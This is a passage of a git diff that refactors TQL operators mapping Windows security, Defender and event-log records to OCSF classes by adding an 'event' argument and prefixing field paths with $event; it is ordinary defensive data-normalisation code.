$event.windows.EventData.param2).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param1 = faulting application name (redundant with process.name — dropped) // param4 = faulting module name \ // param5 = faulting module version | left in unmapped; no OCSF module object // param12 = faulting module path / // param3, param6, param8, param10, param13 = timestamps, offset, report ID — unmapped -drop windows.EventData.param1 +drop $event.windows.EventData.param1 diff --git a/microsoft/operators/windows/ocsf/events/application_hang.tql b/microsoft/operators/windows/ocsf/events/application_hang.tql index b9f42c8..f0b408b 100644 --- a/microsoft/operators/windows/ocsf/events/application_hang.tql +++ b/microsoft/operators/windows/ocsf/events/application_hang.tql @@ -1,31 +1,36 @@ --- description: Application Hang (EID 1002) → OCSF Process Activity (1007, Terminate) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 2 // Terminate -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 2 // Terminate +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — Windows Event Log Level 2 (Error) // param4 = faulting process ID (hex string, e.g. "0x1a4c") // param9 = full path to the hanging application // param2 = hanging application version -ocsf.process = { - pid: int(move windows.EventData.param4, base=16), - path: move windows.EventData.param9, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.param4, base=16), + path: move $event.windows.EventData.param9, file: { type_id: 8, // Executable File - version: (move windows.EventData.param2).string(), + version: (move $event.windows.EventData.param2).string(), }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path // param1 = application name (redundant with process.name — dropped) // param3 = application timestamp \ @@ -33,4 +38,4 @@ ocsf.process.file.path = ocsf.process.path // param6 = hang duration (ms) | // param7 = hang flags | // param8 = WER report ID / -drop windows.EventData.param1 +drop $event.windows.EventData.param1 diff --git a/microsoft/operators/windows/ocsf/events/authorize_session.tql b/microsoft/operators/windows/ocsf/events/authorize_session.tql index 823ec7a..a711b11 100644 --- a/microsoft/operators/windows/ocsf/events/authorize_session.tql +++ b/microsoft/operators/windows/ocsf/events/authorize_session.tql @@ -1,22 +1,27 @@ --- description: Special Privileges Assigned to New Logon (EID 4672) → OCSF Authorize Session (3003, Assign Privileges) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authorize_session" -ocsf.category_uid = 3 -ocsf.class_uid = 3003 -ocsf.activity_id = 1 // Assign Privileges -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3003 +$event.ocsf.activity_id = 1 // Assign Privileges +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.user = { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, +$event.ocsf.user = { + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, } -ocsf.session = { - uid_alt: move windows.EventData.SubjectLogonId, +$event.ocsf.session = { + uid_alt: move $event.windows.EventData.SubjectLogonId, } -ocsf.privileges = (move windows.EventData.PrivilegeList).split_regex(r"\s+") +$event.ocsf.privileges = (move $event.windows.EventData.PrivilegeList).split_regex(r"\s+") diff --git a/microsoft/operators/windows/ocsf/events/defender_asr.tql b/microsoft/operators/windows/ocsf/events/defender_asr.tql index 3b62940..defb673 100644 --- a/microsoft/operators/windows/ocsf/events/defender_asr.tql +++ b/microsoft/operators/windows/ocsf/events/defender_asr.tql @@ -2,55 +2,60 @@ description: > Windows Defender Attack Surface Reduction Block (EID 1121) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] // ASR blocks are always high-severity actionable events. -ocsf.severity_id = 4 // High -ocsf.disposition_id = 2 // Blocked +$event.ocsf.severity_id = 4 // High +$event.ocsf.disposition_id = 2 // Blocked -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: move windows.EventData["Rule ID"], - desc: move windows.EventData["Rule Name"], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: move $event.windows.EventData["Rule ID"], + desc: move $event.windows.EventData["Rule Name"], types: ["ASR Rule Block"], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Process that was blocked. -ocsf.actor = { +$event.ocsf.actor = { process: { - path: move windows.EventData["Process name"], + path: move $event.windows.EventData["Process name"], file: { type_id: 1 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path // User is "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user // Affected file with hashes; wrap in evidences as required by Detection Finding. -ocsf.file = { - path: move windows.EventData.Path, +$event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, } -ocsf.file.name = ocsf.file.path.split("\\")[-1] +$event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] // Parse "SHA256=" or "MD5=,SHA256=,..." into hash objects. let $algorithms = { @@ -59,11 +64,11 @@ let $algorithms = { SHA256: 3, SHA512: 4, } -ocsf.file.hashes = ((move windows.EventData.Hashes) +$event.ocsf.file.hashes = ((move $event.windows.EventData.Hashes) .split(",") .map(h => h.split("=", max=1)) .map(kv => { algorithm_id: $algorithms[kv[0]?]? else 99, value: kv[1]?, })) -ocsf.evidences = [{ file: move ocsf.file }] +$event.ocsf.evidences = [{ file: move $event.ocsf.file }] diff --git a/microsoft/operators/windows/ocsf/events/defender_detection.tql b/microsoft/operators/windows/ocsf/events/defender_detection.tql index 3e95141..b89fa69 100644 --- a/microsoft/operators/windows/ocsf/events/defender_detection.tql +++ b/microsoft/operators/windows/ocsf/events/defender_detection.tql @@ -2,17 +2,22 @@ description: > Windows Defender Malware Detection/Remediation (EID 1116 Detected, 1117 Action Taken) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] -ocsf.severity_id = move windows.EventData["Severity ID"] +$event.ocsf.severity_id = move $event.windows.EventData["Severity ID"] // Defender Action IDs → OCSF disposition_id (present on EID 1117). let $dispositions = { @@ -23,55 +28,55 @@ let $dispositions = { "9": 16, // No Action → No Action "10": 2, // Block → Blocked } -if windows.EventData.has("Action ID") { - ocsf.disposition_id = $dispositions[(move windows.EventData["Action ID"]).string()]? else 99 +if $event.windows.EventData.has("Action ID") { + $event.ocsf.disposition_id = $dispositions[(move $event.windows.EventData["Action ID"]).string()]? else 99 } // Threat name is copied into finding_info.title then moved into malware.name. -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: move windows.EventData["Detection ID"], - types: [move windows.EventData["Category Name"]], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: move $event.windows.EventData["Detection ID"], + types: [move $event.windows.EventData["Category Name"]], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Detected file; wrap in evidences as required by Detection Finding. -ocsf.file = { - path: move windows.EventData.Path, +$event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } -ocsf.file.name = ocsf.file.path.split("\\")[-1] -ocsf.evidences = [{ file: move ocsf.file }] +$event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] +$event.ocsf.evidences = [{ file: move $event.ocsf.file }] // Process that triggered the detection. -ocsf.actor = { +$event.ocsf.actor = { process: { - path: move windows.EventData["Process Name"], + path: move $event.windows.EventData["Process Name"], file: { type_id: 1 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path // Detection User is "DOMAIN\username" format. -_user = (move windows.EventData["Detection User"]).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData["Detection User"]).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user // Drop sentinel/redundant fields. -drop windows.EventData.Unused -drop windows.EventData.Unused2 -drop windows.EventData.Unused3 -drop windows.EventData["Severity Name"] -drop windows.EventData["Action Name"] -drop windows.EventData["Type Name"] -drop windows.EventData["Origin Name"] -drop windows.EventData["Execution Name"] -drop windows.EventData["Status Description"] -drop windows.EventData["Remediation User"] +drop $event.windows.EventData.Unused +drop $event.windows.EventData.Unused2 +drop $event.windows.EventData.Unused3 +drop $event.windows.EventData["Severity Name"] +drop $event.windows.EventData["Action Name"] +drop $event.windows.EventData["Type Name"] +drop $event.windows.EventData["Origin Name"] +drop $event.windows.EventData["Execution Name"] +drop $event.windows.EventData["Status Description"] +drop $event.windows.EventData["Remediation User"] diff --git a/microsoft/operators/windows/ocsf/events/defender_signature_update.tql b/microsoft/operators/windows/ocsf/events/defender_signature_update.tql index e446ecc..0bc5f15 100644 --- a/microsoft/operators/windows/ocsf/events/defender_signature_update.tql +++ b/microsoft/operators/windows/ocsf/events/defender_signature_update.tql @@ -2,15 +2,20 @@ description: > Windows Defender Signature Update (EID 2000) → Base Event (0, 0) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.base_event" -ocsf.category_uid = 0 -ocsf.class_uid = 0 -ocsf.activity_id = 0 -ocsf.type_uid = 0 +$event.ocsf.category_uid = 0 +$event.ocsf.class_uid = 0 +$event.ocsf.activity_id = 0 +$event.ocsf.type_uid = 0 // Signature version details stay in unmapped for downstream consumers. // "Product Name" is redundant with metadata.product.name. -drop windows.EventData["Product Name"]? +drop $event.windows.EventData["Product Name"]? diff --git a/microsoft/operators/windows/ocsf/events/defender_tamper.tql b/microsoft/operators/windows/ocsf/events/defender_tamper.tql index 6fcbcb0..41c8986 100644 --- a/microsoft/operators/windows/ocsf/events/defender_tamper.tql +++ b/microsoft/operators/windows/ocsf/events/defender_tamper.tql @@ -2,27 +2,32 @@ description: > Windows Defender Tamper Events (EID 5001 Real-Time Protection Disabled, 5007 Configuration Changed) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // AV tamper events are always high-severity. -ocsf.severity_id = 4 // High +$event.ocsf.severity_id = 4 // High let $titles = { "5001": "Windows Defender Real-Time Protection Disabled", "5007": "Windows Defender Configuration Changed", } -ocsf.finding_info = { - title: $titles[ocsf.metadata.event_code]? else "Windows Defender Tamper", - uid: ocsf.metadata.original_event_uid, +$event.ocsf.finding_info = { + title: $titles[$event.ocsf.metadata.event_code]? else "Windows Defender Tamper", + uid: $event.ocsf.metadata.original_event_uid, types: ["Software: Antivirus"], } // "Product Name" is redundant with metadata.product.name. -drop windows.EventData["Product Name"] +drop $event.windows.EventData["Product Name"] diff --git a/microsoft/operators/windows/ocsf/events/defender_threat.tql b/microsoft/operators/windows/ocsf/events/defender_threat.tql index c292099..e9dc983 100644 --- a/microsoft/operators/windows/ocsf/events/defender_threat.tql +++ b/microsoft/operators/windows/ocsf/events/defender_threat.tql @@ -2,15 +2,20 @@ description: > Windows Defender Threat Found/Action (EID 1006 Found, 1007 Action) → OCSF Detection Finding (2004) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.detection_finding" -ocsf.category_uid = 2 -ocsf.class_uid = 2004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id -ocsf.metadata.profiles = ["host", "security_control"] +$event.ocsf.category_uid = 2 +$event.ocsf.class_uid = 2004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id +$event.ocsf.metadata.profiles = ["host", "security_control"] // Map string severity name to OCSF severity_id. let $severities = { @@ -19,7 +24,7 @@ let $severities = { "High": 4, "Severe": 5, } -ocsf.severity_id = $severities[move windows.EventData.Severity]? else 0 +$event.ocsf.severity_id = $severities[move $event.windows.EventData.Severity]? else 0 // Action string → OCSF disposition_id (EID 1007 only). let $dispositions = { @@ -29,46 +34,46 @@ let $dispositions = { "Allow": 1, // Allowed "Block": 2, // Blocked } -if windows.EventData.has("Action") { - ocsf.disposition_id = $dispositions[move windows.EventData.Action]? else 99 +if $event.windows.EventData.has("Action") { + $event.ocsf.disposition_id = $dispositions[move $event.windows.EventData.Action]? else 99 } // Threat name is copied into finding_info.title then moved into malware.name. -ocsf.finding_info = { - title: windows.EventData["Threat Name"], - uid: (move windows.EventData.ID).string(), - types: [move windows.EventData.Category], +$event.ocsf.finding_info = { + title: $event.windows.EventData["Threat Name"], + uid: (move $event.windows.EventData.ID).string(), + types: [move $event.windows.EventData.Category], } -ocsf.malware = [{ - name: move windows.EventData["Threat Name"], +$event.ocsf.malware = [{ + name: move $event.windows.EventData["Threat Name"], }] // Detected file; wrap in evidences as required by Detection Finding (EID 1006 only). -if windows.EventData.Path? != null { - ocsf.file = { - path: move windows.EventData.Path, +if $event.windows.EventData.Path? != null { + $event.ocsf.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } - ocsf.file.name = ocsf.file.path.split("\\")[-1] - ocsf.evidences = [{ file: move ocsf.file }] + $event.ocsf.file.name = $event.ocsf.file.path.split("\\")[-1] + $event.ocsf.evidences = [{ file: move $event.ocsf.file }] } // Process that triggered the detection (EID 1006 only). -if windows.EventData["Process Name"]? != null { - ocsf.actor = { +if $event.windows.EventData["Process Name"]? != null { + $event.ocsf.actor = { process: { - path: move windows.EventData["Process Name"], + path: move $event.windows.EventData["Process Name"], file: { type_id: 1 }, }, } - ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] - ocsf.actor.process.file.name = ocsf.actor.process.name - ocsf.actor.process.file.path = ocsf.actor.process.path + $event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] + $event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name + $event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path } // User is "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } diff --git a/microsoft/operators/windows/ocsf/events/eventlog_clear.tql b/microsoft/operators/windows/ocsf/events/eventlog_clear.tql index c73ed80..0b7f023 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_clear.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_clear.tql @@ -1,29 +1,34 @@ --- description: Audit Log Cleared (EID 1102) → OCSF Event Log Activity (1008, Clear) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.event_log_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1008 -ocsf.activity_id = 1 // Clear -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1008 +$event.ocsf.activity_id = 1 // Clear +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Clearing the security audit log is a high-severity indicator of an attacker // covering their tracks (MITRE ATT&CK T1070.001). -ocsf.severity_id = 4 // High +$event.ocsf.severity_id = 4 // High -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ClientProcessId, base=16), + pid: int(move $event.windows.EventData.ClientProcessId, base=16), }, } diff --git a/microsoft/operators/windows/ocsf/events/eventlog_start.tql b/microsoft/operators/windows/ocsf/events/eventlog_start.tql index de3d2fa..f25ffa6 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_start.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_start.tql @@ -1,16 +1,21 @@ --- description: Event Log Service Started (EID 6005) → OCSF Windows Service Activity (201004, Start) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 3 // Start -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 3 // Start +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { +$event.ocsf.win_service = { name: "Windows Event Log", } -drop windows.EventData +drop $event.windows.EventData diff --git a/microsoft/operators/windows/ocsf/events/eventlog_stop.tql b/microsoft/operators/windows/ocsf/events/eventlog_stop.tql index ea4424a..88ff085 100644 --- a/microsoft/operators/windows/ocsf/events/eventlog_stop.tql +++ b/microsoft/operators/windows/ocsf/events/eventlog_stop.tql @@ -1,16 +1,21 @@ --- description: Event Log Service Stopped (EID 6006) → OCSF Windows Service Activity (201004, Stop) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 4 // Stop -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 4 // Stop +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { +$event.ocsf.win_service = { name: "Windows Event Log", } -drop windows.EventData +drop $event.windows.EventData diff --git a/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql b/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql index c37fb5a..091617e 100644 --- a/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql +++ b/microsoft/operators/windows/ocsf/events/explicit_credential_logon.tql @@ -1,50 +1,55 @@ --- description: Logon with Explicit Credentials (EID 4648) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 1 // Logon +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // EID 4648 records the attempt, not the outcome; no status is available. -ocsf.user = { - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.user = { + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // The process that called LogonUser/CreateProcessWithLogonW. -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid: move windows.EventData.LogonGuid, - uid_alt: move windows.EventData.SubjectLogonId, + uid: move $event.windows.EventData.LogonGuid, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ProcessId, base=16), - path: move windows.EventData.ProcessName, + pid: int(move $event.windows.EventData.ProcessId, base=16), + path: move $event.windows.EventData.ProcessName, file: { type_id: 8 }, }, } -ocsf.actor.process.name = ocsf.actor.process.path.split("\\")[-1] -ocsf.actor.process.file.name = ocsf.actor.process.name -ocsf.actor.process.file.path = ocsf.actor.process.path +$event.ocsf.actor.process.name = $event.ocsf.actor.process.path.split("\\")[-1] +$event.ocsf.actor.process.file.name = $event.ocsf.actor.process.name +$event.ocsf.actor.process.file.path = $event.ocsf.actor.process.path -ocsf.dst_endpoint = { - hostname: move windows.EventData.TargetServerName, +$event.ocsf.dst_endpoint = { + hostname: move $event.windows.EventData.TargetServerName, } // Where the logon originated from (may differ from the actor's host in lateral movement). -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // TargetLogonGuid and TargetInfo stay in unmapped; no clean OCSF mapping. diff --git a/microsoft/operators/windows/ocsf/events/group_management.tql b/microsoft/operators/windows/ocsf/events/group_management.tql index 89ddaa9..469781f 100644 --- a/microsoft/operators/windows/ocsf/events/group_management.tql +++ b/microsoft/operators/windows/ocsf/events/group_management.tql @@ -2,12 +2,17 @@ description: > Security Group Lifecycle (EID 4727–4730 global, 4731–4734 local, 4754–4758 universal) → OCSF Group Management (3006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.group_management" -ocsf.category_uid = 3 -ocsf.class_uid = 3006 +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3006 let $activities = { // Create group @@ -21,34 +26,34 @@ let $activities = { // Group changed (universal group modified — no closer activity) "4755": 99, } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } // TargetUser* fields describe the group being acted on (not a user account). -ocsf.group = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, - domain: move windows.EventData.TargetDomainName, +$event.ocsf.group = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, + domain: move $event.windows.EventData.TargetDomainName, } // Member fields only present on add/remove events (4728/4729/4732/4733/4756/4757). -if windows.EventData.MemberSid? != null { - ocsf.user = { - uid: move windows.EventData.MemberSid, - name: move windows.EventData.MemberName, +if $event.windows.EventData.MemberSid? != null { + $event.ocsf.user = { + uid: move $event.windows.EventData.MemberSid, + name: move $event.windows.EventData.MemberName, } } // PrivilegeList is always "-" on these events; drop to keep unmapped clean. -drop windows.EventData.PrivilegeList +drop $event.windows.EventData.PrivilegeList diff --git a/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql b/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql index 8c0e62d..517c372 100644 --- a/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql +++ b/microsoft/operators/windows/ocsf/events/kerberos_preauth_failed.tql @@ -1,26 +1,31 @@ --- description: Kerberos Pre-Authentication Failed (EID 4771) → OCSF Authentication (3002, Authentication Ticket/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 3 // Authentication Ticket (TGT request) -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 3 // Authentication Ticket (TGT request) +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure — pre-auth always fails for this EID -ocsf.severity_id = 2 // Low -ocsf.status_code = move windows.EventData.Status // Kerberos error code (e.g. 0x18 = wrong password) +$event.ocsf.status_id = 2 // Failure — pre-auth always fails for this EID +$event.ocsf.severity_id = 2 // Low +$event.ocsf.status_code = move $event.windows.EventData.Status // Kerberos error code (e.g. 0x18 = wrong password) -ocsf.user = { - uid: move windows.EventData.TargetSid, - name: move windows.EventData.TargetUserName, +$event.ocsf.user = { + uid: move $event.windows.EventData.TargetSid, + name: move $event.windows.EventData.TargetUserName, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // PreAuthType, TicketOptions, ServiceName — unmapped. diff --git a/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql b/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql index 551a68f..83f49e1 100644 --- a/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql +++ b/microsoft/operators/windows/ocsf/events/kerberos_service_ticket.tql @@ -1,39 +1,44 @@ --- description: Kerberos Service Ticket Requested (EID 4769) → OCSF Authentication (3002, Service Ticket) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 4 // Service Ticket -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 3 +$event.ocsf.class_uid = 3002 +$event.ocsf.activity_id = 4 // Service Ticket +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Status 0x0 = success; anything else = failure (e.g. 0x1F = no TGT). -ocsf.status_id = 1 if windows.EventData.Status == "0x0" else 2 -ocsf.status_code = move windows.EventData.Status +$event.ocsf.status_id = 1 if $event.windows.EventData.Status == "0x0" else 2 +$event.ocsf.status_code = move $event.windows.EventData.Status // TargetUserName usually includes @REALM (e.g. "jdoe@CORP.LOCAL"); split off // the realm into domain. Fall back to TargetDomainName when no @ is present. -_parts = (move windows.EventData.TargetUserName).split("@") -ocsf.user = { +_parts = (move $event.windows.EventData.TargetUserName).split("@") +$event.ocsf.user = { name: _parts[0], - domain: _parts[1]? else move windows.EventData.TargetDomainName, + domain: _parts[1]? else move $event.windows.EventData.TargetDomainName, } drop _parts -ocsf.dst_endpoint = { - svc_name: move windows.EventData.ServiceName, +$event.ocsf.dst_endpoint = { + svc_name: move $event.windows.EventData.ServiceName, } -ocsf.src_endpoint = { - ip: move windows.EventData.IpAddress, - port: move windows.EventData.IpPort, +$event.ocsf.src_endpoint = { + ip: move $event.windows.EventData.IpAddress, + port: move $event.windows.EventData.IpPort, } // The logon GUID links this TGS request back to the original TGT logon event. -ocsf.session = { - uid: move windows.EventData.LogonGuid, +$event.ocsf.session = { + uid: move $event.windows.EventData.LogonGuid, } // TicketOptions, TicketEncryptionType, ServiceSid, TransmittedServices — unmapped. diff --git a/microsoft/operators/windows/ocsf/events/logon.tql b/microsoft/operators/windows/ocsf/events/logon.tql index 0c7ceea..b6b3573 100644 --- a/microsoft/operators/windows/ocsf/events/logon.tql +++ b/microsoft/operators/windows/ocsf/events/logon.tql @@ -1,47 +1,52 @@ --- description: Successful Logon (EID 4624) → OCSF Authentication (3002, Logon) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.authentication" -ocsf.category_uid = 3 -ocsf.class_uid = 3002 -ocsf.activity_id = 1 // Logon -ocsf.type_uid = 